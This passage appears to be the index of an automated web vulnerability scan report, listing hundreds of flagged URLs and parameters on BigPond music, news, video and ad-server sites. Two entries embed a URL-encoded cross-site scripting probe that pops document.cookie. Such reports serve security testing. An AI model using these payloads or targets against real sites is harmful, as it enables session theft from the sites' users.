2.322. http://bigpondmusic.com/mixtapes/my [REST URL parameter 1]

2.323. http://bigpondmusic.com/mixtapes/my [REST URL parameter 2]

2.324. http://bigpondmusic.com/mixtapes/my [REST URL parameter 2]

2.325. http://bigpondmusic.com/mixtapes/my [name of an arbitrarily supplied request parameter]

2.326. http://bigpondmusic.com/my/password [REST URL parameter 1]

2.327. http://bigpondmusic.com/my/password [REST URL parameter 1]

2.328. http://bigpondmusic.com/my/password [REST URL parameter 2]

2.329. http://bigpondmusic.com/my/password [REST URL parameter 2]

2.330. http://bigpondmusic.com/my/password [name of an arbitrarily supplied request parameter]

2.331. http://bigpondmusic.com/news/ [REST URL parameter 1]

2.332. http://bigpondmusic.com/news/ [REST URL parameter 1]

2.333. http://bigpondmusic.com/news/ [name of an arbitrarily supplied request parameter]

2.334. http://bigpondmusic.com/news/ [ref parameter]

2.335. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 1]

2.336. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 1]

2.337. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 2]

2.338. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 2]

2.339. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 4]

2.340. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [REST URL parameter 4]

2.341. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [name of an arbitrarily supplied request parameter]

2.342. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 1]

2.343. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 1]

2.344. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 2]

2.345. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 2]

2.346. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 4]

2.347. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 4]

2.348. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [name of an arbitrarily supplied request parameter]

2.349. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 1]

2.350. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 1]

2.351. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 2]

2.352. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 2]

2.353. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 4]

2.354. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 4]

2.355. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [name of an arbitrarily supplied request parameter]

2.356. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 1]

2.357. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 1]

2.358. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 2]

2.359. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 2]

2.360. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 4]

2.361. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 4]

2.362. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [name of an arbitrarily supplied request parameter]

2.363. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 1]

2.364. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 1]

2.365. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 2]

2.366. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 2]

2.367. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 4]

2.368. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [REST URL parameter 4]

2.369. http://bigpondmusic.com/news/article/5080/wavves-arrested-on-marijuana-charges [name of an arbitrarily supplied request parameter]

2.370. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 1]

2.371. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 1]

2.372. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 2]

2.373. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 2]

2.374. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 4]

2.375. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [REST URL parameter 4]

2.376. http://bigpondmusic.com/news/article/5081/lykke-li-gets-ready-for-wounded-rhymes [name of an arbitrarily supplied request parameter]

2.377. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 1]

2.378. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 1]

2.379. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 2]

2.380. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 2]

2.381. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 4]

2.382. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [REST URL parameter 4]

2.383. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [name of an arbitrarily supplied request parameter]

2.384. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 1]

2.385. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 1]

2.386. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 2]

2.387. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 2]

2.388. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 4]

2.389. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [REST URL parameter 4]

2.390. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [name of an arbitrarily supplied request parameter]

2.391. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 1]

2.392. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 1]

2.393. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 2]

2.394. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 2]

2.395. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 4]

2.396. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [REST URL parameter 4]

2.397. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [name of an arbitrarily supplied request parameter]

2.398. http://bigpondmusic.com/search [REST URL parameter 1]

2.399. http://bigpondmusic.com/search [REST URL parameter 1]

2.400. http://bigpondmusic.com/search [name of an arbitrarily supplied request parameter]

2.401. http://bigpondmusic.com/urlshorten/totwitter [REST URL parameter 1]

2.402. http://bigpondmusic.com/urlshorten/totwitter [REST URL parameter 1]

2.403. http://bigpondmusic.com/urlshorten/totwitter [REST URL parameter 2]

2.404. http://bigpondmusic.com/urlshorten/totwitter [REST URL parameter 2]

2.405. http://bigpondnews.com/articles/Crime/2010/11/22/PNG_boy_gang_raped_by_women_542337.html [REST URL parameter 2]

2.406. http://bigpondnews.com/articles/Crime/2010/11/22/PNG_boy_gang_raped_by_women_542337.html [REST URL parameter 2]

2.407. http://bigpondnews.com/articles/Crime/2010/11/22/PNG_boy_gang_raped_by_women_542337.html [REST URL parameter 2]

2.408. http://bigpondnews.com/articles/Entertainment/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html [REST URL parameter 2]

2.409. http://bigpondnews.com/articles/Entertainment/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html [REST URL parameter 2]

2.410. http://bigpondnews.com/articles/Entertainment/2010/11/23/Bishop_sorry_for_royal_wedding_comments_542567.html [REST URL parameter 2]

2.411. http://bigpondnews.com/articles/Entertainment/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html [REST URL parameter 2]

2.412. http://bigpondnews.com/articles/Entertainment/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html [REST URL parameter 2]

2.413. http://bigpondnews.com/articles/Entertainment/2010/11/23/Oprah_hosts_Aussie_special_before_trip_542772.html [REST URL parameter 2]

2.414. http://bigpondnews.com/articles/Finance/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html [REST URL parameter 2]

2.415. http://bigpondnews.com/articles/Finance/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html [REST URL parameter 2]

2.416. http://bigpondnews.com/articles/Finance/2010/11/23/NBN_needs_cost_benefit_analysis_542657.html [REST URL parameter 2]

2.417. http://bigpondnews.com/articles/OddSpot/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html [REST URL parameter 2]

2.418. http://bigpondnews.com/articles/OddSpot/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html [REST URL parameter 2]

2.419. http://bigpondnews.com/articles/OddSpot/2010/11/23/Man_strips_to_shun_naked_scanner_542756.html [REST URL parameter 2]

2.420. http://bigpondnews.com/articles/Technology/2010/11/23/Extraterrestrial_particles_discovered_542531.html [REST URL parameter 2]

2.421. http://bigpondnews.com/articles/Technology/2010/11/23/Extraterrestrial_particles_discovered_542531.html [REST URL parameter 2]

2.422. http://bigpondnews.com/articles/Technology/2010/11/23/Extraterrestrial_particles_discovered_542531.html [REST URL parameter 2]

2.423. http://bigpondnews.com/articles/Technology/2010/11/23/US_rocket_sent_into_space_542693.html [REST URL parameter 2]

2.424. http://bigpondnews.com/articles/Technology/2010/11/23/US_rocket_sent_into_space_542693.html [REST URL parameter 2]

2.425. http://bigpondnews.com/articles/Technology/2010/11/23/US_rocket_sent_into_space_542693.html [REST URL parameter 2]

2.426. http://bigpondnews.com/articles/TopStories/2010/11/23/Cambodian_festival_stampede_542577.html [REST URL parameter 2]

2.427. http://bigpondnews.com/articles/TopStories/2010/11/23/Cambodian_festival_stampede_542577.html [REST URL parameter 2]

2.428. http://bigpondnews.com/articles/TopStories/2010/11/23/Cambodian_festival_stampede_542577.html [REST URL parameter 2]

2.429. http://bigpondnews.com/articles/TopStories/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html [REST URL parameter 2]

2.430. http://bigpondnews.com/articles/TopStories/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html [REST URL parameter 2]

2.431. http://bigpondnews.com/articles/TopStories/2010/11/23/Hundreds_flee_spewing_Philippino_volcano_542630.html [REST URL parameter 2]

2.432. http://bigpondnews.com/articles/TopStories/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html [REST URL parameter 2]

2.433. http://bigpondnews.com/articles/TopStories/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html [REST URL parameter 2]

2.434. http://bigpondnews.com/articles/TopStories/2010/11/23/NZ_mine_rescue_robot_breaks_down_542670.html [REST URL parameter 2]

2.435. http://bigpondnews.com/articles/TopStories/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html [REST URL parameter 2]

2.436. http://bigpondnews.com/articles/TopStories/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html [REST URL parameter 2]

2.437. http://bigpondnews.com/articles/TopStories/2010/11/23/Qantas_A380_flights_to_resume_Saturday_542712.html [REST URL parameter 2]

2.438. http://bigpondnews.com/articles/TopStories/2010/11/23/Robber_shot_dead_outside_hotel_542635.html [REST URL parameter 2]

2.439. http://bigpondnews.com/articles/TopStories/2010/11/23/Robber_shot_dead_outside_hotel_542635.html [REST URL parameter 2]

2.440. http://bigpondnews.com/articles/TopStories/2010/11/23/Robber_shot_dead_outside_hotel_542635.html [REST URL parameter 2]

2.441. http://bigpondnews.com/articles/TopStories/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html [REST URL parameter 2]

2.442. http://bigpondnews.com/articles/TopStories/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html [REST URL parameter 2]

2.443. http://bigpondnews.com/articles/TopStories/2010/11/23/Third_male_in_court_over_Belanglo_death_542697.html [REST URL parameter 2]

2.444. http://bigpondnews.com/articles/World/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html [REST URL parameter 2]

2.445. http://bigpondnews.com/articles/World/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html [REST URL parameter 2]

2.446. http://bigpondnews.com/articles/World/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html [REST URL parameter 2]

2.447. http://bigpondvideo.com/ [bd5b1%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea21cf603a85 parameter]

2.448. http://bigpondvideo.com/ [name of an arbitrarily supplied request parameter]

2.449. http://bigpondvideo.com/ [ref parameter]

2.450. http://bigpondvideo.com/AFL/ [name of an arbitrarily supplied request parameter]

2.451. http://bigpondvideo.com/AFL/ [ref parameter]

2.452. http://bigpondvideo.com/GamesLatest/ [name of an arbitrarily supplied request parameter]

2.453. http://bigpondvideo.com/GamesLatest/ [ref parameter]

2.454. http://bigpondvideo.com/GamesTrailers/ [name of an arbitrarily supplied request parameter]

2.455. http://bigpondvideo.com/GamesTrailers/ [ref parameter]

2.456. http://bigpondvideo.com/Music/ [name of an arbitrarily supplied request parameter]

2.457. http://bigpondvideo.com/Music/ [ref parameter]

2.458. http://bigpondvideo.com/NRL/ [name of an arbitrarily supplied request parameter]

2.459. http://bigpondvideo.com/NRL/ [ref parameter]

2.460. http://bigpondvideo.com/NewsOnDemand/ [c014e%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E522ee782289 parameter]

2.461. http://bigpondvideo.com/NewsOnDemand/ [name of an arbitrarily supplied request parameter]

2.462. http://bigpondvideo.com/NewsOnDemand/ [ref parameter]

2.463. http://bigpondvideo.com/NewsOnDemandEntertainment/ [name of an arbitrarily supplied request parameter]

2.464. http://bigpondvideo.com/NewsOnDemandEntertainment/ [ref parameter]

2.465. http://bigpondvideo.com/NewsOnDemandFinance/ [name of an arbitrarily supplied request parameter]

2.466. http://bigpondvideo.com/NewsOnDemandFinance/ [ref parameter]

2.467. http://bigpondvideo.com/NewsOnDemandNational/ [name of an arbitrarily supplied request parameter]

2.468. http://bigpondvideo.com/NewsOnDemandNational/ [ref parameter]

2.469. http://bigpondvideo.com/NewsOnDemandOddspot/ [name of an arbitrarily supplied request parameter]

2.470. http://bigpondvideo.com/NewsOnDemandOddspot/ [ref parameter]

2.471. http://bigpondvideo.com/NewsOnDemandWorld/ [name of an arbitrarily supplied request parameter]

2.472. http://bigpondvideo.com/NewsOnDemandWorld/ [ref parameter]

2.473. http://bigpondvideo.com/Sport/ [name of an arbitrarily supplied request parameter]

2.474. http://bigpondvideo.com/Sport/ [ref parameter]

2.475. http://bigpondvideo.com/Top_Music_Videos/ [name of an arbitrarily supplied request parameter]

2.476. http://bigpondvideo.com/Top_Music_Videos/ [ref parameter]

2.477. http://bigpondvideo.com/Trailers/ [name of an arbitrarily supplied request parameter]

2.478. http://bigpondvideo.com/Trailers/ [ref parameter]

2.479. http://bigpondvideo.com/Travel/ [name of an arbitrarily supplied request parameter]

2.480. http://bigpondvideo.com/Travel/ [ref parameter]

2.481. http://bigpondvideo.com/Web/Flash/carousel [name of an arbitrarily supplied request parameter]

2.482. http://bigpondvideo.com/Web/Flash/carousel [rand parameter]

2.483. http://bigpondvideo.com/Web/Flash/flash_overlay [name of an arbitrarily supplied request parameter]

2.484. http://bigpondvideo.com/Web/Flash/flash_overlay [rand parameter]

2.485. http://bigpondvideo.com/Web/Flash/flash_overlay_all [name of an arbitrarily supplied request parameter]

2.486. http://bigpondvideo.com/Web/Flash/flash_overlay_all [rand parameter]

2.487. http://bigpondvideo.com/Web/Flash/headerFl [name of an arbitrarily supplied request parameter]

2.488. http://bigpondvideo.com/Web/Flash/headerFl [rand parameter]

2.489. http://bigpondvideo.com/Web/Flash/leaveBehind [name of an arbitrarily supplied request parameter]

2.490. http://bigpondvideo.com/Web/Flash/leaveBehind [rand parameter]

2.491. http://bigpondvideo.com/Web/Flash/main_nav [name of an arbitrarily supplied request parameter]

2.492. http://bigpondvideo.com/Web/Flash/main_nav [rand parameter]

2.493. http://bigpondvideo.com/Web/Flash/presentationPlayer [name of an arbitrarily supplied request parameter]

2.494. http://bigpondvideo.com/Web/Flash/presentationPlayer [rand parameter]

2.495. http://bigpondvideo.com/Web/Flash/skyscraperL [name of an arbitrarily supplied request parameter]

2.496. http://bigpondvideo.com/Web/Flash/skyscraperL [rand parameter]

2.497. http://bigpondvideo.com/Web/Flash/skyscraperR [name of an arbitrarily supplied request parameter]

2.498. http://bigpondvideo.com/Web/Flash/skyscraperR [rand parameter]

2.499. http://bigpondvideo.com/Web/Flash/title_bar [name of an arbitrarily supplied request parameter]

2.500. http://bigpondvideo.com/Web/Flash/title_bar [rand parameter]

2.501. http://bigpondvideo.com/footytv/ [name of an arbitrarily supplied request parameter]

2.502. http://bigpondvideo.com/footytv/ [ref parameter]

2.503. http://bigpondvideo.com/games/ [name of an arbitrarily supplied request parameter]

2.504. http://bigpondvideo.com/games/ [ref parameter]

2.505. http://bigpondvideo.com/leaguetv/ [name of an arbitrarily supplied request parameter]

2.506. http://bigpondvideo.com/leaguetv/ [ref parameter]

2.507. http://bigpondvideo.com/musictv/ [name of an arbitrarily supplied request parameter]

2.508. http://bigpondvideo.com/musictv/ [ref parameter]

2.509. http://bigpondvideo.com/newstv/ [name of an arbitrarily supplied request parameter]

2.510. http://bigpondvideo.com/newstv/ [ref parameter]

2.511. http://bigpondvideo.com/racingtv/ [name of an arbitrarily supplied request parameter]

2.512. http://bigpondvideo.com/racingtv/ [ref parameter]

2.513. http://bigpondvideo.com/surfing/ [name of an arbitrarily supplied request parameter]

2.514. http://bigpondvideo.com/surfing/ [ref parameter]

2.515. http://bigpondvideo.com/v8/ [name of an arbitrarily supplied request parameter]

2.516. http://bigpondvideo.com/v8/ [ref parameter]

2.517. http://blog.utest.com/ [name of an arbitrarily supplied request parameter]

2.518. http://bs.serving-sys.com/BurstingPipe/adServer.bs [npui parameter]

2.519. http://dvd.bigpondmovies.com/dvd/161286/Too-Late-To-Say-Goodbye [REST URL parameter 2]

2.520. http://dvd.bigpondmovies.com/dvd/161286/Too-Late-To-Say-Goodbye [REST URL parameter 2]

2.521. http://dvd.bigpondmovies.com/dvd/161286/Too-Late-To-Say-Goodbye [REST URL parameter 2]

2.522. http://dvd.bigpondmovies.com/dvd/161286/Too-Late-To-Say-Goodbye [REST URL parameter 3]

2.523. http://dvd.bigpondmovies.com/dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03! [REST URL parameter 2]

2.524. http://dvd.bigpondmovies.com/dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03! [REST URL parameter 2]

2.525. http://dvd.bigpondmovies.com/dvd/177305/Secret-Diary-Of-A-Call-Girl-Series-03! [REST URL parameter 3]

2.526. http://iad.bigpondvideo.com/ [name of an arbitrarily supplied request parameter]

2.527. http://iad.bigpondvideo.com/indexInfinityPlayer.php [allowOverlays parameter]

2.528. http://iad.bigpondvideo.com/indexInfinityPlayer.php [allowPreBuffer parameter]

2.529. http://iad.bigpondvideo.com/indexInfinityPlayer.php [autoStart parameter]

2.530. http://iad.bigpondvideo.com/indexInfinityPlayer.php [bFinish parameter]

2.531. http://iad.bigpondvideo.com/indexInfinityPlayer.php [bgColor parameter]

2.532. http://iad.bigpondvideo.com/indexInfinityPlayer.php [bgColor parameter]

2.533. http://iad.bigpondvideo.com/indexInfinityPlayer.php [cStyle parameter]

2.534. http://iad.bigpondvideo.com/indexInfinityPlayer.php [cStyle parameter]

2.535. http://iad.bigpondvideo.com/indexInfinityPlayer.php [cStyle parameter]

2.536. http://iad.bigpondvideo.com/indexInfinityPlayer.php [controls parameter]

2.537. http://iad.bigpondvideo.com/indexInfinityPlayer.php [controls parameter]

2.538. http://iad.bigpondvideo.com/indexInfinityPlayer.php [domain parameter]

2.539. http://iad.bigpondvideo.com/indexInfinityPlayer.php [environment parameter]

2.540. http://iad.bigpondvideo.com/indexInfinityPlayer.php [errorFontColor parameter]

2.541. http://iad.bigpondvideo.com/indexInfinityPlayer.php [errorFontSize parameter]

2.542. http://iad.bigpondvideo.com/indexInfinityPlayer.php [flv parameter]

2.543. http://iad.bigpondvideo.com/indexInfinityPlayer.php [fontColor parameter]

2.544. http://iad.bigpondvideo.com/indexInfinityPlayer.php [fontSize parameter]

2.545. http://iad.bigpondvideo.com/indexInfinityPlayer.php [fullScreen parameter]

2.546. http://iad.bigpondvideo.com/indexInfinityPlayer.php [fullScreen parameter]

2.547. http://iad.bigpondvideo.com/indexInfinityPlayer.php [height parameter]

2.548. http://iad.bigpondvideo.com/indexInfinityPlayer.php [height parameter]

2.549. http://iad.bigpondvideo.com/indexInfinityPlayer.php [height parameter]

2.550. http://iad.bigpondvideo.com/indexInfinityPlayer.php [height parameter]

2.551. http://iad.bigpondvideo.com/indexInfinityPlayer.php [holdingImgDefault parameter]

2.552. http://iad.bigpondvideo.com/indexInfinityPlayer.php [invoke parameter]

2.553. http://iad.bigpondvideo.com/indexInfinityPlayer.php [isSecure parameter]

2.554. http://iad.bigpondvideo.com/indexInfinityPlayer.php [live parameter]

2.555. http://iad.bigpondvideo.com/indexInfinityPlayer.php [liveBwOption parameter]

2.556. http://iad.bigpondvideo.com/indexInfinityPlayer.php [location parameter]

2.557. http://iad.bigpondvideo.com/indexInfinityPlayer.php [name of an arbitrarily supplied request parameter]

2.558. http://iad.bigpondvideo.com/indexInfinityPlayer.php [os parameter]

2.559. http://iad.bigpondvideo.com/indexInfinityPlayer.php [os parameter]

2.560. http://iad.bigpondvideo.com/indexInfinityPlayer.php [phpSessionId parameter]

2.561. http://iad.bigpondvideo.com/indexInfinityPlayer.php [platformId parameter]

2.562. http://iad.bigpondvideo.com/indexInfinityPlayer.php [propertyId parameter]

2.563. http://iad.bigpondvideo.com/indexInfinityPlayer.php [radio parameter]

2.564. http://iad.bigpondvideo.com/indexInfinityPlayer.php [randId parameter]

2.565. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showBw parameter]

2.566. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showBw parameter]

2.567. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showFeedback parameter]

2.568. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showFeedback parameter]

2.569. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showMenu parameter]

2.570. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showMenu parameter]

2.571. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showTitle parameter]

2.572. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showTooltip parameter]

2.573. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showTooltip parameter]

2.574. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showUnmetered parameter]

2.575. http://iad.bigpondvideo.com/indexInfinityPlayer.php [siteId parameter]

2.576. http://iad.bigpondvideo.com/indexInfinityPlayer.php [stf parameter]

2.577. http://iad.bigpondvideo.com/indexInfinityPlayer.php [stf parameter]

2.578. http://iad.bigpondvideo.com/indexInfinityPlayer.php [titleHeight parameter]

2.579. http://iad.bigpondvideo.com/indexInfinityPlayer.php [width parameter]

2.580. http://iad.bigpondvideo.com/indexInfinityPlayer.php [width parameter]

2.581. http://iad.bigpondvideo.com/indexInfinityPlayer.php [width parameter]

2.582. http://iad.bigpondvideo.com/indexInfinityPlayer.php [width parameter]

2.583. http://iad.bigpondvideo.com/indexInfinityPlayer.php [windowless parameter]

2.584. http://iad.bigpondvideo.com/indexInfinityPlayer.php [windowless parameter]

2.585. http://iad.bigpondvideo.com/indexInfinityPlayer.php [wmv parameter]

2.586. http://media.sensis.com.au/hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 [REST URL parameter 1]

2.587. http://media.sensis.com.au/hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 [REST URL parameter 2]

2.588. http://media.sensis.com.au/hserver/acc_random=113168337601/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AAMSZ=1x1/AREA=GAMING.GAMEARENA.ALLPLATFORMS.NEWS/POSITION=ABV1/pageid=254201693891 [name of an arbitrarily supplied request parameter]

2.589. http://media.sensis.com.au/hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691 [REST URL parameter 1]

2.590. http://media.sensis.com.au/hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691 [REST URL parameter 2]

2.591. http://media.sensis.com.au/hserver/acc_random=155089197954/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=942103891691 [name of an arbitrarily supplied request parameter]

2.592. http://media.sensis.com.au/hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 1]

2.593. http://media.sensis.com.au/hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [REST URL parameter 2]

2.594. http://media.sensis.com.au/hserver/acc_random=228483031829/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]

2.595. http://media.sensis.com.au/hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 [REST URL parameter 1]

2.596. http://media.sensis.com.au/hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 [REST URL parameter 2]

2.597. http://media.sensis.com.au/hserver/acc_random=312042836869/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=734038778588 [name of an arbitrarily supplied request parameter]

2.598. http://media.sensis.com.au/hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 [REST URL parameter 1]

2.599. http://media.sensis.com.au/hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 [REST URL parameter 2]

